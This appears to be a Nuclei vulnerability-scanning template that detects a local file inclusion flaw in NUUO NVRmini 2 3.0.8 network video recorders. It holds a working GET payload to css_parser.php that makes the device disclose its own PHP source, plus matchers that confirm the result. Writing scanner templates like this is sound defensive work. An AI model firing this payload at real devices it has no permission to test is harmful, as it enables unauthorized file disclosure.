40 lines
972 B
YAML
40 lines
972 B
YAML
id: nuuo-file-inclusion
|
|
|
|
info:
|
|
name: NUUO NVRmini 2 3.0.8 - Local File Inclusion
|
|
author: princechaddha
|
|
severity: high
|
|
description: NUUO NVRmini 2 3.0.8 is vulnerable to local file inclusion.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/40211
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cwe-id: CWE-22
|
|
metadata:
|
|
max-request: 1
|
|
tags: lfi,edb,nuuo
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/css_parser.php?css=css_parser.php"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "$_GET['css']"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/css"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a00473045022100ddc50577e817491d485204eec064616d75e425492844699e18a6de08efd178220220338f24ff13c01c093fd46d902ad39191fc02992d70b67a63255d5aa84013e8ca:922c64590222798bb761d5b6d8e72950
|